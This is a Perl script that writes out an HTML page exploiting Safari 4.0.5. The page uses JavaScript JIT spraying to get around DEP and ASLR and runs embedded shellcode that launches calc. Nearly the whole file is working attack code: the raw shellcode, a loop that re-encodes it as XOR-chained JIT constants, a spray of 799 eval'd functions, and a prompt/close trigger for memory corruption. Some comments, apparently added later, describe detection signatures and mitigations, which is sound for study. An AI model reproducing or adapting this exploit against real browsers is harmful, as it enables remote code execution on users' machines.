#!/usr/bin/perl
#
# Script JIT shellcode generator
# for DEP and ASLR bypass
# tested on Safari (ver. 4 and 5)
# By Alexey Sintsov (dookie at inbox.ru / a.sintsov at dsec.ru)
# from Digital Security 
# [www.dsecrg.com]
# 
# Details: http://dsecrg.com/pages/pub/show.php?id=26
# P.S. here 0x1000 is used as the mul. factor: (0x0000XXYY*0x00010000=0xXXYY0000)
# this is much better for automatic generation than the mul. of sqrt of 0xXXYY0000 8)
#
#
# Safari 4.0.5 Memory corruption exploit
# Orig exploit by Krystian Kloskowski
# (used for demo)
#
#
# Special for www.xakep.ru
# 
# Usage: perl safari_jit.pl > exploit.html
#
# 
#
	# Payload: the Metasploit x86 "exec calc" stub named in the file header.
	# The trailing "calc\x00" appears to be the command string the stub runs.
	# Nothing below depends on the payload's content: it is only re-encoded
	# byte by byte into JavaScript constants, so from a detection standpoint
	# the stable artefacts are the encoding pattern further down, not these
	# bytes.
	# NOTE: the script has no `use strict`/`use warnings`; every variable
	# except $val (declared with `my` inside the copy loop) is a package
	# global.
	$shellcode = 
	"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
	"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
	"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
	"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
	"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
	"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
	"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
	"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
	"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
	"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
	"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
	"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" .
	"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
	"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5calc\x00";
	
	# High 16 bits of the fixed destination the generated code writes to.
	# The two bytes are loaded into AH/AL and multiplied by ESI (0x10000)
	# in $initJit, giving 0x080A0000 as the trailing comment says.  The
	# whole technique rests on a region at a known address being both
	# writable and executable; that assumption is what mitigations such as
	# randomised or non-executable JIT regions remove.
	$addr="\x08\x0A"; #0x080A0000

	
#################################################################
########                     BEGIN                    ###########
#################################################################	
	
	# Length of the raw payload in bytes.
	$len=length($shellcode);
	
	# Number of 0xCC (int3) filler bytes appended below; taken from the
	# length's remainder mod 4 (the copy loop steps 4 bytes at a time).
	$add=$len % 4;
	
	# Accumulates the per-dword copy sequence produced by the loop below.
	$copyJit="";
	
	# Pad the payload with int3 bytes.
	for($i=0;$i<$add;$i++)
	{
		$shellcode.="\xCC";
	}
	
	# Leading run of neutral constants.  Each "0x........^" fragment becomes
	# one 32-bit immediate in the JIT-compiled expression; this block is a
	# fixed-size preamble ahead of the setup code (presumably alignment /
	# landing padding for the spray -- the page does not say).  The JS
	# comment markers are emitted into the generated page verbatim.
	$offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+\n".
			"\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";	
			
		
	# Setup sequence (the "init JIT shellcode").  Every constant has the
	# form 0x14EBxxxx: the low half carries the two-byte instruction named
	# in the trailing JS comment, the high half is the same fixed pair on
	# every line -- the repetition a JIT-spray detector keys on.  Per the
	# per-line comments it computes ESI = 0x10000 (multiplier), then
	# EAX = $addr bytes * ESI (= 0x080A0000), ECX = that address (write
	# pointer) and EBX = 4 (write stride).
	$initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
			 "\"0x14EB01B4^\"+\n". 
			 "\"0x14EB00B0^\"+\n".
			 "\"0x14EBE0F7^\"+// EAX=0x100*0x100\n". 
			 "\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n". 
			 "\"0x14EBC031^\"+ //XOR EAX,EAX\n".
			 sprintf("\"0x14EB%02lxB4^\"+\n",ord substr($addr,0,1)).
			 sprintf("\"0x14EB%02lxB0^\"+\n",ord substr($addr,1,1)).
             "\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
			 "\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".
			 "\"0x14EBDB33^\"+ // xor ebx, ebx\n".
			 "\"0x14EB04B3^\"+ // mov bl, 4    ; EBX = 0x4 - step \n";
			 
	
	# Re-encode the payload.  Each 4-byte group becomes six constants that
	# rebuild the dword in EAX (upper halfword via AH/AL, MUL ESI to shift
	# it up, lower halfword via AH/AL) plus two that store EAX at [ECX] and
	# advance ECX by EBX.  Bytes are taken in reverse order ($i+3 first) so
	# that, with AL holding byte $i, the little-endian store reproduces the
	# original byte order in memory.  $byte1..$byte4 are package globals.
	for($i=0;$i<length($shellcode);$i+=4)
	{
		my $val="";
		$byte1=substr($shellcode,($i+3),1);
		$byte2=substr($shellcode,($i+2),1);
		$byte3=substr($shellcode,($i+1),1);
		$byte4=substr($shellcode,($i),1);
		$val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";
		$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);
		$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
		$val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";
		$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);
		$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);
		$val.="\"0x14EB0189^\"+ // mov [ecx], eax ; copy part of shellcode to RWX page\n".
			  "\"0x14EBCB03^\"+ // add ecx, ebx ; ecx=ecx+4 - move pointer for next copy\n";
		      
		$copyJit.=$val;
		
	}

	# Tail: zero the low 16 bits of ECX (back to the start of the region
	# the loop filled) and jump there.
	$jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
			"\"0x14EB00B1^\"+ // mov cl, 00 ; ECX - RWE memory WITH shellcode\n".
			"\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";
			
	
	# Static start of the emitted HTML/JS.  It is a single Perl string, so
	# the JavaScript inside cannot be commented in place; what it holds:
	#  - make_buf(): doubles a seed string until it covers len*4 characters,
	#    then trims it to len (a heap-fill helper).
	#  - fff(): the trigger sequence against the parent window (prompt /
	#    close / prompt with the large buffer); the file header credits the
	#    original crash to Krystian Kloskowski.
	#  - SPRAY / JIT: JIT is opened as a function-body string "{ var y=( "
	#    and the Perl-built constants above complete the expression.  To a
	#    content scanner the result is a long run of XOR-chained hex
	#    literals inside a string that is later eval'd (see $endPage).
	$page="
<!-- 
JIT-SPRAY
           for
                 Safari 4.0.5 - 5.0.0

(vuln for 4.0.5 only)

JavaScript JIT SHELLCODE and spray
             for
	     ASLR / DEP bypass (Win x32)
		 
By Alexey Sintsov
   from Digital Security research Group
 
special for www.xakep.ru

[DSecRG]
www.dsecrg.com

-->

<script>

function make_buf(payload, len) {
    while(payload.length < (len * 4)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}

function fff()
{

	var a = parent;

	var buf = make_buf(unescape('%u0104%u0606'), 68000);
	
	
    a.prompt(alert);
    a.prompt(buf);
    a.close();
	a.prompt(alert);
	
}

var SPRAY=\"\";

var JIT=\"{ \"+
\"var y=(\"+
";

# Static end of the emitted page: a final constant without "^" closes the
# expression, "return y; }" closes the function body, and a loop then
# defines 799 functions zlo_1..zlo_799 (i runs 1..799), each with the JIT
# body and each called immediately, all through one eval(SPRAY); fff() is
# called last.  The eval of a programmatically built string, the hundreds
# of identically shaped functions and the repeated 0x14EB.... constants
# are the observable signatures of this page.  The closing </center> has
# no matching opening tag in the emitted markup (kept as in the original).
$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";


var zl=\"zlo_\";
	
for (var i=1;i<800;i++)
{
	SPRAY+=\"function \"+zl+i+\"()\"+JIT+\" \"+zl+i+\"();\";
}

eval(SPRAY);


fff();
</script>


</center>";

# Assemble the page in emission order and write it to STDOUT (the header's
# usage line redirects it to a file).
$page.=$offsetJit.$initJit.$copyJit.$jumJit.$endPage;

print $page;